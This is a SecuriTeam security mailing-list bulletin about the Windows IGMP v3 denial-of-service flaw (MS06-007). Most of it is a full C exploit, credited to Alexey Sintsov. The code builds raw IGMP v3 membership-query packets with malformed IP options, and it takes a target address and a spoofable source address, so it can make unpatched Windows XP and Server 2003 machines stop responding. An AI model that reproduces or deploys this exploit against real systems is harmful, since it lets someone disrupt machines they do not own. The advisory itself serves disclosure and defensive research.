[EXPL] IGMP v3 DoS (MS06-007, Exploit)



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



IGMP v3 DoS (MS06-007, Exploit)
------------------------------------------------------------------------


SUMMARY

The Internet Group Management Protocol (
<http://en.wikipedia.org/wiki/Internet_Group_Management_Protocol> IGMP) is
a communications protocol used to manage the membership of Internet
Protocol multicast groups. IGMP is used by IP hosts and adjacent multicast
routers to establish multicast group memberships. It is an integral part
of the IP multicast specification, like ICMP for unicast connections.

A specially crafted IGMP packet sent to a vulnerable system could create a
denial of service situation and cause the system to stop responding.

DETAILS

/*
IGMP v3 DoS Exploit

ref:
http://www.juniper.net/security/auto/vulnerabilities/vuln2866.html
ref:
http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx

by Alexey Sintsov (dookie@xxxxxxxx)

Req:
Administrator rights on system
Windows Firewall off (for sending RAW packets)

Affected Products:
Microsoft Corporation Windows XP All
Microsoft Corporation Windows Server 2003 All
*/


#include <stdio.h>
#include <winsock2.h>

#pragma comment(lib, "Ws2_32.lib")

typedef struct iphdr
{
unsigned char verlen; // IP version & length
unsigned char tos; // Type of service
unsigned short total_len; // Total length of the
packet
unsigned short ident; // Unique identifier
unsigned short frag_and_flags; // Flags
unsigned char ttl; // Time to live
unsigned char proto; // Protocol (TCP, UDP etc)
unsigned short checksum; // IP checksum
unsigned int sourceIP; // Source IP
unsigned int destIP; // Destination IP
unsigned short options[2];

} IPHEADER;

typedef struct igmphdr {
unsigned char type;
unsigned char code;
unsigned short checksum;
unsigned long group;
unsigned char ResvSQVR;
unsigned char QQIC;
unsigned short num;
unsigned long addes;

} IGMPHEADER;

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;

while (size > 1) {
cksum += *buffer++;
size -= sizeof(USHORT);
}

if (size)
cksum += *(UCHAR*)buffer;

cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);

return (USHORT)(~cksum);
}

int sendIGMP(char* a, char* b)
{
unsigned int dst_addr, src_addr;

IPHEADER ipHeader;
IGMPHEADER igmpHeader;
dst_addr=inet_addr (b);
src_addr=inet_addr (a);

char szSendBuf[60]={0};
int rect;

WSADATA WSAData;
if (WSAStartup(MAKEWORD(2,2), &WSAData) != 0)
return FALSE;

SOCKET sock;
if ((sock = WSASocket(AF_INET,SOCK_RAW,
IPPROTO_RAW,NULL,0, 0x01)) == INVALID_SOCKET) {
printf("Create socket error");
WSACleanup();
return FALSE;
}

BOOL flag=TRUE;
if (setsockopt(sock,IPPROTO_IP,2,(char *)&flag,sizeof(flag)) ==
SOCKET_ERROR) {
printf("Set options error");
closesocket(sock);
WSACleanup();
return FALSE;
}

SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=htons(99);
ssin.sin_addr.s_addr=dst_addr;

ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=htons(sizeof(ipHeader)+sizeof(igmpHeader));

ipHeader.ident=htons(0);

ipHeader.frag_and_flags=0;

ipHeader.ttl=128;
ipHeader.proto=IPPROTO_IGMP;

ipHeader.checksum=0;

ipHeader.tos=0;

ipHeader.destIP=dst_addr;
ipHeader.sourceIP=src_addr;

//Ip options
ipHeader.options[0]=htons(0x0000); //bug is here =)
ipHeader.options[1]=htons(0x0000);

igmpHeader.type=0x11; //v3 Membership Query
igmpHeader.code=5;
igmpHeader.num=htons(1);
igmpHeader.ResvSQVR=0x0;
igmpHeader.QQIC=0;
igmpHeader.group=inet_addr("0.0.0.0");
igmpHeader.addes=dst_addr;

igmpHeader.checksum=0;

memcpy(szSendBuf, &igmpHeader, sizeof(igmpHeader));

igmpHeader.checksum=checksum((USHORT
*)szSendBuf,sizeof(igmpHeader));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &igmpHeader,
sizeof(igmpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(igmpHeader), 0, 4);

ipHeader.checksum=ntohs(checksum((USHORT *)szSendBuf,
sizeof(ipHeader)+sizeof(igmpHeader)));

memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));

rect=sendto(sock, szSendBuf,
sizeof(ipHeader)+sizeof(igmpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));

if (rect==SOCKET_ERROR) {
printf("Send error: <%d>\n",WSAGetLastError());
closesocket(sock);
WSACleanup();
return 0;
}

closesocket(sock);
WSACleanup();

return 1;
}

main(int argc, char **argv)
{
if(argc<2)
{
printf("\nIGMP v3 DoS Exploit (MS06-007) by Alexey
Sintsov(dookie@xxxxxxxx)\n\n");
printf("Usage:\n");
printf("c:\\igmps.exe <target ip> <source ip>\n\n");
exit(0);
}

sendIGMP(argv[2], argv[1]);
return 0;
}


ADDITIONAL INFORMATION

The original article can be found at:
<http://www.milw0rm.com/exploits/1599>
http://www.milw0rm.com/exploits/1599

Related articles:
<http://www.securiteam.com/windowsntfocus/5BP0E1FHPM.html> TCP/IP IGMP
DoS (MS06-007)
<http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx>
http://www.microsoft.com/technet/security/Bulletin/MS06-007.mspx



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.